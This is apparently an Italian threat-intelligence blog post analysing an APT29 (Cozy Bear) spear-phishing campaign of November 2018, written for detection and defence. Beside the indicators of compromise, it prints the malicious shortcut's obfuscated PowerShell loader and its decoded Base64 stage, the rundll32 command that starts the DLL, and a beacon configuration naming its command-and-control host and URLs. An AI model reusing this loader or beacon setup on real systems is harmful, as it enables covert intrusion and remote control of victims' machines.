Campagna APT29 (CozyBear) del 20 Novembre 2018

· 2 min lettura
Campagna APT29 (CozyBear) del 20 Novembre 2018

Il gruppo APT 29 conosciuto come Cozy Bear sembra essere tornato "dai ghiacci" e sembra aver preso di mira, come detto in questo tweet da FireEye, diversi settori americani e la Difesa statunitense.

Gli IOC relativi a questa nuova ondata di Cozy Bear sembrano essere relativamente nuovi e difficili da trovare, ma per il momento, analisti e ricercatori, hanno fornito su fonti aperte (OSInt) i seguenti dati:

IP, ISP e REPUTAZIONE:

95.216.59.92 - Hetzner.de - No segnalazioni né bassa reputazione
92.122.18.115 - Akamai - Segnalato su AbusedIP per hacking e phishing

URL:

http://pandorasong.com

Il sito non è raggiungibile il 20/11 alle 09.40. Restituisce "Connection was reset".

SHA256:

2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1

MD5 e FILENAME:

658c6fe38f95995fa8dc8f6cfe41df7b ds7002.zip (innocuo)
313f4808aa2a2073005d219bc68971cd ds7002.PDF (innocuo)
3fccf531ff0ae6fedd7c586774b17a2d ds7001.zip (archivio malevolo)
6ed0020b0851fb71d5b0076f4ee95f3c ds7002.lnk / ds7002.bin (payload malevolo)
16bbc967a8b6a365871a05c74a4f345b AudioSes.dll / cyzfc.dat (DLL malevola)

INDIRIZZI EMAIL NOTI:

[email protected]
DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202[email protected]

OGGETTI DELLE EMAIL INVIATE:

Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you

L'archivio ds7002.zip è stato aperto su macchina virtuale ed è stato appurato che contenesse un collegamento Windows .lnk.
Il collegamento, una volta aperto, ha eseguito il seguente comando:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

La stringa contenuta nella variabile $zk è in Base64 e, se decodificata, produce il seguente output:

$ptgt=0x0005e2be;$vcq=0x000623b6;$tb="ds7002.lnk";if (-not(Test-Path $tb)){$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;if (-not $oe) {exit}[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);}$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';$oe=New-Object byte[]($vcq-$ptgt);$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);$r=$vzvi.Read($oe,0,$vcq-$ptgt);$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);$zk=[Text.Encoding]::ASCII.GetString($oe);iex $zk;

La DLL malevola (AudioSes.dll) viene eseguita da Rundll32.exe con il parametro "PointFunctionCall", con il seguente comando:

"C:\Windows\system32\rundll32.exe" C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

La funzione sopra citata presenta la configurazione:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong.com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong.com
  port: 443
c2_urls:
  pandorasong.com/radio/xmlrpc/v45
  pandorasong.com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Essa sembrerebbe essere una versione modificata del profilo disponibile su GitHub chiamato "Pandora.profile", consultabile qui: GitHub. Motivo della modifica sarebbe il tentativo di effettuare evasion dai più comuni antivirus, modificando dinamicamente il payload e le stringhe.


Letture interessanti: